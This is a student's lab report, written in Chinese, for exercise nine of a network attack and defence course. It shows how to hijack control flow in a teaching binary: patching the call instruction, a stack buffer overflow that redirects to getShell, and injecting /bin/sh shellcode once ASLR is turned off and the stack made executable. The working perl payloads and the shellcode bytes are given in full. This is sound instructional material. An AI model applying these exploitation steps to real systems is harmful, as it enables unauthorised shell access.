20232801 2023-2024-2 《网络攻防实践》实践九报告

1.实践内容

（1）手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。
（2）利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。
（3）注入一个自己制作的shellcode并运行这段shellcode

2.实践过程

打开kali虚拟机，将用户名改为ly。将学习通中下载的pwn1工具放入到kali中，通过 mv pwn1 pwn20232801修改pwn1的学号信息。

1. 修改程序机器指令，改变程序执行流程
使用命令：objdump -d pwn20232801 | more 反编译这个文件。使用enter键可以继续向下查看，找到main函数，foo函数，并且能够发现在main函数中调用了foo函数。
call 8048491:这条指令将调用位于地址8048491处的foo函数,其对应的机器指令为 e8d7ffffff。
main函数调用foo，对应机器指令为“ e8 d7ffffff”
我们想要：让它调用getShell，只要修改“d7ffffff”为，"getShell-80484ba"对应的补码就行：47d-4ba 得到补码为：c3ffffff

2. 修改可执行文件
为了防止意外，可以回溯源工具，在这里，对pwn20232801 进行了一个复制,pwn20232801-2

cp pwn20232801 pwn20232801-2

打开pwn20232801-2

vi pwn20232801-2

打开以后发现全是乱码

输入:%!xxd将显示转化为16进制

通过/e8d7找到需要修改的内容
修改d7 为c3，注意：在退出保存前需要将16进制转化为原格式。:%!xxd -r

我们再次反汇编一下查看是否正确调用getshell:objdump -d pwn2 | more ,修改成功。

运行：./pwn20232801

3. 改变程序执行流，造成BOF攻击
使用objdump -d pwn20232801 | more观察foo函数，发现其在栈顶中预留了0x1c大小，也就是28个字节的缓冲区域。
当我们输入的字符串长度超出了它预留空间的话，则会出现缓冲区溢出。
那我们只需要需构造一个字符串，使其溢出，溢出部分覆盖原始的返回地址，变成getshell函数的起始地址即可。

另外可以用一个语句perl -e ‘print “11111111222222223333333344444444\x7d\x84\x04\x08\x0a”’ > 20232801input`
使用 命令：查看是否修改成功。

xxd 20232801input 

输入：(cat 20222801input;cat) | ./pwn20222801-2 攻击成功

4. 注入shellcode代码

首先，安装execstack，下载链接：http://ftp.de.debian.org/debian/pool/main/p/prelink/execstack_0.0.20131005-1+b10_amd64.deb
下载后使用命令dpkg -i execstack_0.0.20131005-1+b10_amd64.deb完成安装 （在此实验由于不小心将复制前的原工具删掉了，重新下载了一个pwn1）

• 修改设置

execstack -s pwn1    //设置堆栈可执行
execstack -q pwn1    //查询文件的堆栈是否可执行
 echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
 more /proc/sys/kernel/randomize_va_space  //查询

在这里我们需要分析如何让他溢出覆盖：perl -e 'print "A" x 32;print "\x1\x2\x3\x4\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x00"' > input_shellcode 即前面的x1\x2\x3\x4需要填写什么。
在一个终端1中输入(cat input_shellcode;cat) | ./pwn1
在打开另外一个终端2输入：ps -ef | grep pwn20232906 可以pwn1的进程号，这里我的是27964。

gdb调试该进程

attach 27964
disassemble foo //通过设置断点，来查看注入buf的内存地址
break *0x080484ae   

c   在终端1中按下回车键 （注意是先C 再回车）
 info r esp  //找到esp寄存器的值，获得我们注入的字符串的地址
 x/16x 0xffffd52c

从0xffffd52c开始观察，可以发现数据采用小端字节序，并且将返回地址改为ff ff d5 30就可以让程序执行Shellcode，所以\x1\x2\x3\x4修改为\x30\x50\xff\xff
计算方法为：0xffffd52c+4=ffffd530

于是我们便重新利用perl语言，将返回地址修改正确，并在最后加上回车（0x0a），然后重新运行程序。

perl -e 'print "A" x 32;print "\x30\x50\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x00\x0a"' > input_shellcode
(cat input_shellcode;cat) | ./pwn1

发现我们成功的获得了shell

3.学习中遇到的问题及解决

• 问题1： 在kali 中使用 apt-get Execstack 无法下载execstack工具
• 问题1解决方案：找到下载网址，在浏览器中下载后再解压。
• 问题2：在注入shellcode代码是，使用前面修改过的pwn20232801-2始终找不到正确的地址
• 问题2解决方案：重新下载了一个pwn1工具。

4.实践总结

学习了什么是缓冲区溢出：指在程序执行过程中，向程序的缓冲区写入了超过其长度的内容，导致数据溢出到被分配空间之外的内存空间，进而覆盖其他内存空间的数据。
以及堆，栈的在数据结构和操作系统中的不同。

参考资料

• execstack下载
  实践指导书